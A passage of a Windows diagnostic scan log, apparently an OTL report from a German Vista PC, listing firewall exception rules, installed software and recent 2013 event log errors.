"{F9E44214-6BC0-4487-8EC6-AB7B30018A81}" = lport=139 | protocol=6 | dir=in | app=system |

========== Vista Active Application Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{02B9C774-B905-41FC-A2D1-75DF4619E895}" = dir=in | app=c:\program files\windows live\messenger\msnmsgr.exe |
"{0A5D1B97-BBE1-495D-BBBF-F30D4F93162D}" = protocol=17 | dir=in | app=c:\program files\steam\steam.exe |
"{0BAF21EF-E9FC-4CF4-93B0-3ED23A7158E8}" = dir=in | app=c:\program files\common files\apple\apple application support\webkit2webprocess.exe |
"{0C32669F-9681-40CE-A1D4-C7AB38968466}" = protocol=6 | dir=out | app=system |
"{389B7691-D2B7-4C32-981C-C0E2E19DB03E}" = dir=in | app=c:\program files\itunes\itunes.exe |
"{50E11D82-CDA2-4E47-AAD9-95823320FC4C}" = protocol=6 | dir=in | app=c:\program files\steam\steamapps\common\lara croft and the guardian of light\lcgol_demo.exe |
"{51A3D040-9C95-42E2-BE71-1B9AD02ED48B}" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"{52E95DAA-933C-4D68-9697-3CF80F64C39A}" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\devicesetup.exe |
"{54A09723-E23A-4A6F-A840-10DC2ED4C344}" = protocol=6 | dir=in | app=c:\program files\netdrive\ndsvc.exe |
"{63E29624-2FE6-42EB-99F6-33773F75B861}" = protocol=6 | dir=in | app=c:\program files\steam\steam.exe |
"{756C08B9-7CDD-4990-B794-C4ADD80BB032}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office12\onenote.exe |
"{7AF5684D-E528-4F82-926D-674F83F20695}" = dir=in | app=c:\program files\skype\phone\skype.exe |
"{7C6897E3-B4C4-450F-9764-FE373F7CFDAA}" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"{7DF486C3-196E-4F8A-AC7C-222230CD76A3}" = protocol=6 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"{81656EC6-C46F-4AFD-8484-CE9DFE27EB8E}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{819D59A3-99E3-4B76-9FAF-F28AE3C434DF}" = dir=in | app=c:\program files\windows live\messenger\wlcsdk.exe |
"{848E79B3-00E7-4552-BF0F-B162002B4C7C}" = protocol=17 | dir=in | app=c:\program files\steam\steamapps\common\lara croft and the guardian of light\lcgol_demo.exe |
"{84DE97A2-5504-4898-A5A1-CEF0EDDE3321}" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkystarter.exe |
"{906D20E7-3A39-4285-974C-590269957501}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{94EA64CE-4D98-4475-985C-235F63CC60FE}" = protocol=17 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"{9544BF85-15F9-44AB-A29D-7AC0463E094B}" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"{96F774E7-DCCB-4B20-9E12-0946056C59C6}" = dir=in | app=c:\program files\cyberlink\powerdvd\powerdvd.exe |
"{9F1D8106-7399-41E8-9482-52ED00FFAED6}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{A614BE8C-9BD6-4394-991C-6DACC3AD9742}" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\devicesetup.exe |
"{A7FE49D8-6A96-4DCB-9FDA-F1F57BB7A8F0}" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkystarter.exe |
"{A9FA9560-6BC2-4BD0-814B-4C3DB20A60E9}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{B847FD48-FA6D-4C76-B86F-8F23E7404D85}" = protocol=17 | dir=in | app=c:\program files\netdrive\ndsvc.exe |
"{C2312C03-1D0F-418D-B134-733F7279A5F5}" = protocol=6 | dir=out | app=c:\windows\system32\wudfhost.exe |
"{D78B0574-F8C5-4F89-8149-1AEB518B1E5E}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{E25E6FA1-EDBB-4599-B619-D0A05BF2F11B}" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"{EAAAB938-3FB4-41E7-9EB3-93867BBC6639}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{EE7CB5C6-BD08-41F2-9C8C-0F81FD3A9763}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office12\onenote.exe |
"{F8E7FAB1-45F0-4D7B-B5F5-162903729B9C}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{FE806151-3416-42AC-9A96-3634510E4ABC}" = protocol=6 | dir=out | svc=upnphost | app=c:\windows\system32\svchost.exe |
"TCP Query User{1C44A64E-7EB0-4B06-93EA-2D4268F1C6C4}C:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe |
"TCP Query User{422D3EAE-E423-4344-B580-6B7A3F5818B0}C:\program files\remotedesktopserver\remotedesktopserver.exe" = protocol=6 | dir=in | app=c:\program files\remotedesktopserver\remotedesktopserver.exe |
"TCP Query User{49FA6209-ED38-4394-A976-664D2601A759}C:\mirc\mirc.exe" = protocol=6 | dir=in | app=c:\mirc\mirc.exe |
"TCP Query User{54F32131-E99A-4B90-9163-52790E026ACF}C:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe |
"TCP Query User{99B64360-59F8-4411-A29D-5EFC517B40CF}C:\mirc\mirc.exe" = protocol=6 | dir=in | app=c:\mirc\mirc.exe |
"TCP Query User{9A951EC7-7B4B-48ED-8239-26A5AFF9EF09}C:\program files\myphoneexplorer\myphoneexplorer.exe" = protocol=6 | dir=in | app=c:\program files\myphoneexplorer\myphoneexplorer.exe |
"TCP Query User{9C81CDE5-82E8-4636-A73D-1A6A092697FF}C:\program files\philips\mediamanager\twonkymanager.exe" = protocol=6 | dir=in | app=c:\program files\philips\mediamanager\twonkymanager.exe |
"TCP Query User{AD32AB7E-B300-488E-B15C-C2B182DAB005}C:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe" = protocol=6 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"TCP Query User{BF26C7E1-3F10-4A71-8C98-5B1C0B422B22}C:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe |
"TCP Query User{CC5AEAA9-C7DE-4782-AB51-DB1C20F0E021}C:\program files\philips\mediamanager\twonkyrenderer.exe" = protocol=6 | dir=in | app=c:\program files\philips\mediamanager\twonkyrenderer.exe |
"TCP Query User{D2E5FFA7-7229-473F-93F7-2CD32C4E4C8F}C:\program files\twonky\twonkyserver\twonkyserver.exe" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"TCP Query User{F131C037-70F7-4E1B-B8B7-E614FACAC880}C:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"UDP Query User{012AFCFB-BD0A-40C9-B628-5B7B63313513}C:\program files\twonky\twonkyserver\twonkyserver.exe" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"UDP Query User{04D70229-8EC9-4E6C-8FA7-E4930955B82F}C:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe |
"UDP Query User{0D93800B-6DA5-4E7F-B294-18BA28D202CF}C:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe |
"UDP Query User{1754187E-B36D-4F86-B60B-94CBA11C63F8}C:\program files\myphoneexplorer\myphoneexplorer.exe" = protocol=17 | dir=in | app=c:\program files\myphoneexplorer\myphoneexplorer.exe |
"UDP Query User{B21A7ADF-A21C-4F06-84B4-C03ABC2BF0A7}C:\program files\philips\mediamanager\twonkyrenderer.exe" = protocol=17 | dir=in | app=c:\program files\philips\mediamanager\twonkyrenderer.exe |
"UDP Query User{BA919B03-07EC-4F47-895D-7FA00128CCB8}C:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe" = protocol=17 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"UDP Query User{C2282B50-D257-42B4-8E3F-A9427757132F}C:\mirc\mirc.exe" = protocol=17 | dir=in | app=c:\mirc\mirc.exe |
"UDP Query User{C7D5BAF4-10A1-4D73-8D53-74E7C831C723}C:\mirc\mirc.exe" = protocol=17 | dir=in | app=c:\mirc\mirc.exe |
"UDP Query User{DF097255-0F5C-45B0-81F7-FAEAF073FF5C}C:\program files\remotedesktopserver\remotedesktopserver.exe" = protocol=17 | dir=in | app=c:\program files\remotedesktopserver\remotedesktopserver.exe |
"UDP Query User{E4201583-CF21-48F5-9888-A1ED5E7215F8}C:\program files\philips\mediamanager\twonkymanager.exe" = protocol=17 | dir=in | app=c:\program files\philips\mediamanager\twonkymanager.exe |
"UDP Query User{FA82C556-4213-412C-9542-F1389C34D65C}C:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe |
"UDP Query User{FF74768D-8101-423A-AB2E-BE1C00960A59}C:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |

========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}" = PDFCreator
"{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}" = Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
"{03655260-E933-4DD9-939B-46E8ABCB1184}" = 11589 DVB-T x86
"{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
"{052FDD78-A6EA-3187-8386-C82F4CA3A929}" = Microsoft .NET Framework 3.5 Language Pack SP1 - deu
"{07629207-FAA0-4F1A-8092-BF5085BE511F}" = Unterstützungsdateien für das Microsoft SQL Server-Setup (Englisch)
"{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}" = Windows Live ID Sign-in Assistant
"{0E64B098-8018-4256-BA23-C316A43AD9B0}" = QuickTime
"{11083C7A-D0D6-4DA4-8C3A-74B8389EC07B}" = ATI Catalyst Registration
"{11316260-6666-467B-AC34-183FCB5D4335}" = Acer Mobility Center Plug-In
"{116FF17B-1A30-4FC2-9B01-5BC5BD46B0B3}" = Acer eLock Management
"{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"{1598034D-7147-432C-8CA8-888E0632D124}" = NTI Backup NOW! 4.7
"{1EBD33A9-2AAF-4CE6-8D62-9D3634C8B43B}" = HP Officejet 6500 E710n-z - Grundlegende Software für das Gerät
"{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Windows Live-Uploadtool
"{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
"{26A24AE4-039D-4CA4-87B4-2F83216013FF}" = Java(TM) 6 Update 21
"{28006915-2739-4EBE-B5E8-49B25D32EB33}" = Atheros for Acer Driver v7.2.0.208_Foxconn Installation Program
"{2EEC2A94-7204-45C6-93BB-67EAEB19E4D6}" = Safari
"{2EFA4E4C-7B5F-48F7-A1C0-1AA882B7A9C3}" = HP Update
"{3921A67A-5AB1-4E48-9444-C71814CF3027}" = VCRedistSetup
"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
"{41E654A9-26D0-4EAC-854B-0FA824FFFABB}" = Windows Live Messenger
"{459699C3-9430-4381-964B-4248D87B49F9}" = Apple Mobile Device Support
"{45C56AA7-ED1B-4800-A97F-EDDF3F3520B1}" = Apple Application Support
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4EF8BE6A-899C-4196-94E7-297C5F7A203E}" = pdfforge Toolbar v1.1.1
"{50120000-1105-0000-0000-0000000FF1CE}" = Microsoft Office 2007 Primary Interop Assemblies
"{56C049BE-79E9-4502-BEA7-9754A3E60F9B}" = neroxml
"{58E5844B-7CE2-413D-83D1-99294BF6C74F}" = Acer ePower Management
"{5968F27A-66E6-171E-5311-0A74D74AAD9B}" = ATI Catalyst Install Manager
"{5EE7D259-D137-4438-9A5F-42F432EC0421}" = VC80CRTRedist - 8.0.50727.4053
"{5FC68772-6D56-41C6-9DF1-24E868198AE6}" = Windows Live Call
"{5FCCD531-1B38-4A94-924C-127F722F1031}" = Nero 8
"{5FD89EA1-99C2-40EE-BBF5-20F8991ED756}" = Catalyst Control Center - Branding
"{65DA2EC9-0642-47E9-AAE2-B5267AA14D75}" = Activation Assistant for the 2007 Microsoft Office suites
"{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
"{6AFCA4E1-9B78-3640-8F72-A7BF33448200}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{6F7EA6CA-79F4-44A0-A370-8E82BB16534A}" = NTI Shadow
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}" = Bing Bar
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79155F2B-9895-49D7-8612-D92580E0DE5B}" = Bonjour
"{7AB86D35-DF3B-407F-B43E-468345DABF29}" = SL-6555-SBK
"{7CC673E7-5271-409D-B196-BB76DA60300B}" = Twonky Windows Components
"{7ED4E9AB-9B5D-5380-9AB7-2865CA1DA0DB}" = AMD Fuel
"{7FB12670-0F93-4E1E-B2F5-4F339199A03A}" = Microsoft SQL Server Native Client
"{849A32C3-E75A-4791-9B11-E568BA3525A4}" = Microsoft SQL Server VSS Writer
"{85092B90-AEB2-2E30-0EF1-432EC61F6BD1}" = Catalyst Control Center InstallProxy
"{86B247F9-1D5E-CCC6-3280-71486D9A4E70}" = ATI Stream SDK v2 Developer
"{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
"{88410D8F-8529-492B-B556-2394A29B811B}" = Broadcom Driver v4.102.15.63_Foxconn Installation Program
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8ACC73AA-6511-7C55-B1A9-8E5D1DEAFAA3}" = The Lord of the Rings FREE Trial
"{90120000-0016-0407-0000-0000000FF1CE}" = Microsoft Office Excel MUI (German) 2007
"{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0018-0407-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (German) 2007
"{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001B-0407-0000-0000000FF1CE}" = Microsoft Office Word MUI (German) 2007
"{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001F-0407-0000-0000000FF1CE}" = Microsoft Office Proof (German) 2007
"{90120000-001F-0407-0000-0000000FF1CE}_HOMESTUDENTR_{928D7B99-2BEA-49F9-83B8-20FA57860643}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_HOMESTUDENTR_{1FF96026-A04A-4C3E-B50A-BB7022654D0F}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_HOMESTUDENTR_{71F055E8-E2C6-4214-BB3D-BFE03561B89E}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0410-0000-0000000FF1CE}" = Microsoft Office Proof (Italian) 2007
"{90120000-001F-0410-0000-0000000FF1CE}_HOMESTUDENTR_{A23BFC95-4A73-410F-9248-4C2B48E38C49}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-002C-0407-0000-0000000FF1CE}" = Microsoft Office Proofing (German) 2007
"{90120000-006E-0407-0000-0000000FF1CE}" = Microsoft Office Shared MUI (German) 2007
"{90120000-006E-0407-0000-0000000FF1CE}_HOMESTUDENTR_{A6353E8F-5B8D-47CC-8737-DFF032ED3973}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-00A1-0407-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (German) 2007
"{90120000-00A1-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90140000-0019-0407-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (German) 2010
"{90140000-0019-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{69E54534-4569-4639-89E9-305B60A11601}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0407-0000-0000000FF1CE}" = Microsoft Office Proof (German) 2010
"{90140000-001F-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{65A2328E-FDFB-4CA3-8582-357EA6825FEA}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}_Office14.PUBLISHERR_{99ACCA38-6DD3-48A8-96AE-A283C9759279}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-040C-0000-0000000FF1CE}_Office14.PUBLISHERR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0410-0000-0000000FF1CE}" = Microsoft Office Proof (Italian) 2010
"{90140000-001F-0410-0000-0000000FF1CE}_Office14.PUBLISHERR_{C0743197-FFEE-4C19-BAEB-8F7437DC4C8A}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-002C-0407-0000-0000000FF1CE}" = Microsoft Office Proofing (German) 2010
"{90140000-002C-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{4275FB46-ABDF-4456-876C-17CF64294D9A}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-006E-0407-0000-0000000FF1CE}" = Microsoft Office Shared MUI (German) 2010
"{90140000-006E-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{98EDFD9F-EA76-40CC-BCE9-92C69413F65B}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{90A40407-6000-11D3-8CFE-0150048383C9}" = Microsoft Office 2003 Web Components
"{91120000-002F-0000-0000-0000000FF1CE}" = Microsoft Office Home and Student 2007
"{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{91140000-0019-0000-0000-0000000FF1CE}" = Microsoft Office Publisher 2010
"{91140000-0019-0000-0000-0000000FF1CE}_Office14.PUBLISHERR_{047B0968-E622-4FAA-9B4B-121FA109EDDE}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{99E862CC-6F69-4D39-99AA-DBF71BF3B585}" = OpenOffice.org 3.1
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A5633652-3795-4829-BB0B-644F0279E279}" = Acer eDataSecurity Management
"{A77255C4-AFCB-44A3-BF0F-2091A71FFD9E}" = Acer Crystal Eye Webcam 2.0.9.2
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{A939D341-5A04-4E0A-BB55-3E65B386432D}" = Microsoft Office Small Business Connectivity Components
"{AB6097D9-D722-4987-BD9E-A076E2848EE2}" = Acer Empowering Technology
"{AC4C38FD-A54C-4CA5-92EE-D983CD81293E}" = Microsoft Xbox 360 Accessories 1.2
"{AC76BA86-7AD7-1031-7B44-A95000000001}" = Adobe Reader 9.5.5 - Deutsch
"{AC76BA86-7AD7-5464-3428-900000000004}" = Spelling Dictionaries Support For Adobe Reader 9
"{AEBBFC67-7A03-4DF3-9E71-BA5C9EB4FBEF}" = MobileMe Control Panel
"{B0261E53-B6F1-474A-864B-E7C3CBF468E0}" = iTunes
"{B3276CB1-20B6-4AF9-AAEC-E72C83816495}" = IKEA Home Planner
"{C06554A1-2C1E-4D20-B613-EE62C79927CC}" = Acer eNet Management
"{C7EA1AF1-F908-0832-AA52-5EDBE128FD6B}" = ccc-core-static
"{CA6BCA2F-EDEB-408F-850B-31404BE16A61}" = I.R.I.S.
OCR "{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1 "{CE386A4E-D0DA-4208-8235-BCE43275C694}" = LightScribe 1.4.142.1 "{CE65A9A0-9686-45C6-9098-3C9543A412F0}" = Acer eSettings Management "{D642E38E-0D24-486C-9A2D-E316DD696F4B}" = Microsoft XML Parser "{E10DB5DA-E576-40EA-A7FC-1CB2A7B283A6}" = NVIDIA PhysX "{E1640DA5-89B4-4F52-B15D-5DA3D14F29D4}" = LG USB Modem Drivers "{E28B1E6F-E0AA-4228-AB89-DB4A0C89D426}" = AVerTV "{E9D4FBA9-FB46-A5CE-F52F-516C4B8F0373}" = ccc-utility "{EB0E062C-575D-8154-2682-C84EF432CCF0}" = Catalyst Control Center Graphics Previews Common "{ED00D08A-3C5F-488D-93A0-A04F21F23956}" = Windows Live Communications Platform "{EE7257A2-39A2-4D2F-9DAC-F9F25B8AE1D8}" = Skype™ 5.10 "{EEA54973-AFC8-21C8-1414-246AA9435890}" = CCC Help English "{EFBC0CB1-AFFD-4E74-ACEF-42099F1D49C3}" = HP Officejet 6500 E710n-z Hilfe "{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 "{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard "{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver "{F1FCC8AD-0F88-4D77-8530-0FBB088485F1}" = WEB.DE Update "{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}" = Microsoft Office Live Add-in 1.5 "{F8FF18EE-264A-43FD-B2F6-5EAD40798C2F}" = Windows Live Essentials "{FB0C267C-8B4F-4867-8161-A6A3B66D42C1}" = Marketsplash Schnellzugriffe "{FB91E774-867B-4567-ACE7-8144EF036068}" = Olympus Digital Wave Player "Activation Assistant for the 2007 Microsoft Office suites" = Activation Assistant for the 2007 Microsoft Office suites "Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX "AVerMedia A835 USB TV Tuner" = AVerMedia A835 USB TV Tuner 8.0.0.43 "Avira AntiVir Desktop" = Avira Free Antivirus "AVMFBox" = AVM FRITZ!Box Dokumentation "AVMFBoxPrinter" = AVM FRITZ!Box Druckeranschluss "CCleaner" = CCleaner "CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_2BFAOR2C06_118" = HDAUDIO Soft Data Fax Modem with SmartCP "CornelsenSTVP72" = Cornelsen 
Stoffverteilungsplaner 7.2 "Deutschbuch Arbeitsblattgenerator" = Deutschbuch Arbeitsblattgenerator "DivX Setup.divx.com" = DivX-Setup "Druckschriften Nord_is1" = Pelikan Schulschriften "Free YouTube to MP3 Converter_is1" = Free YouTube to MP3 Converter version 3.2 "Google Chrome" = Google Chrome "GridVista" = Acer GridVista "HOMESTUDENTR" = Microsoft Office Home and Student 2007 "InstallShield_{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker "InstallShield_{1598034D-7147-432C-8CA8-888E0632D124}" = NTI Backup NOW! 4.7 "InstallShield_{6F7EA6CA-79F4-44A0-A370-8E82BB16534A}" = NTI Shadow "InstallShield_{E28B1E6F-E0AA-4228-AB89-DB4A0C89D426}" = AVerTV "KLiteCodecPack_is1" = K-Lite Codec Pack 8.0.0 (Full) "LManager" = Launch Manager "Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware Version 1.51.2.1300 "MediaManager" = MediaManager "Microsoft .NET Framework 3.5 Language Pack SP1 - deu" = Microsoft .NET Framework 3.5 Language Pack SP1 - DEU "Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1 "Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile "Mozilla Thunderbird (2.0.0.24)" = Mozilla Thunderbird (2.0.0.24) "MPE" = MyPhoneExplorer "NetDrive" = NetDrive "Office14.PUBLISHERR" = Microsoft Publisher 2010 "ownCloud" = ownCloud "Picasa 3" = Picasa 3 "PriceGong" = PriceGong 2.6.11 "RemoteDesktopServer" = RemoteDesktopServer "Rossmann Fotowelt Software" = Rossmann Fotowelt Software 4.9 "SCHLECKER Foto Digital Service" = SCHLECKER Foto Digital Service "Schroedel Arbeitsblätter" = Schroedel Arbeitsblätter "Schulausgangsschrift SAS_is1" = Pelikan Schulschriften "Steam App 35150" = Lara Croft and the Guardian of Light Demo "Steam App 48010" = LIMBO Demo "SynTPDeinstKey" = Synaptics Pointing Device Driver "Trine 2_is1" = Trine 2 "Uninstall_is1" = Uninstall 1.0.0.1 "VLC media player" = VLC media player 0.9.9 "WEB.DE Update" = WEB.DE Update "WinLiveSuite_Wave3" = Windows Live Essentials "WinRAR archiver" = 
WinRAR ========== HKEY_CURRENT_USER Uninstall List ========== [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall] "17d33ce3121ed6e5" = Das Mathe Programm "Game Organizer" = GameXN GO "JNLP" = JNLP "Lumines - Puzzle Fusion" = Lumines - Puzzle Fusion ========== Last 20 Event Log Errors ========== [ Application Events ] Error - 28.05.2013 01:59:52 | Computer Name = ant-PC | Source = Bonjour Service | ID = 100 Description = Task Scheduling Error: m->NextScheduledEvent 5817527 Error - 28.05.2013 01:59:52 | Computer Name = ant-PC | Source = Bonjour Service | ID = 100 Description = Task Scheduling Error: m->NextScheduledSPRetry 5817527 Error - 28.05.2013 02:04:07 | Computer Name = ant-PC | Source = WinMgmt | ID = 10 Description = Error - 28.05.2013 08:04:24 | Computer Name = ant-PC | Source = EventSystem | ID = 4621 Description = Error - 28.05.2013 13:26:55 | Computer Name = ant-PC | Source = WinMgmt | ID = 10 Description = Error - 30.05.2013 15:05:48 | Computer Name = ant-PC | Source = WinMgmt | ID = 10 Description = Error - 02.06.2013 08:16:52 | Computer Name = ant-PC | Source = WinMgmt | ID = 10 Description = Error - 02.06.2013 08:58:42 | Computer Name = ant-PC | Source = WinMgmt | ID = 10 Description = Error - 02.06.2013 11:09:38 | Computer Name = ant-PC | Source = Application Error | ID = 1000 Description = Fehlerhafte Anwendung SynTPEnh.exe, Version 10.0.15.0, Zeitstempel 0x46e19971, fehlerhaftes Modul SynTPEnh.exe, Version 10.0.15.0, Zeitstempel 0x46e19971, Ausnahmecode 0xc0000409, Fehleroffset 0x000289dc, Prozess-ID 0x10b8, Anwendungsstartzeit 01ce5f914251a286. Error - 02.06.2013 11:12:37 | Computer Name = ant-PC | Source = WinMgmt | ID = 10 Description = [ OSession Events ] Error - 05.05.2010 04:27:04 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001 Description = ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. 
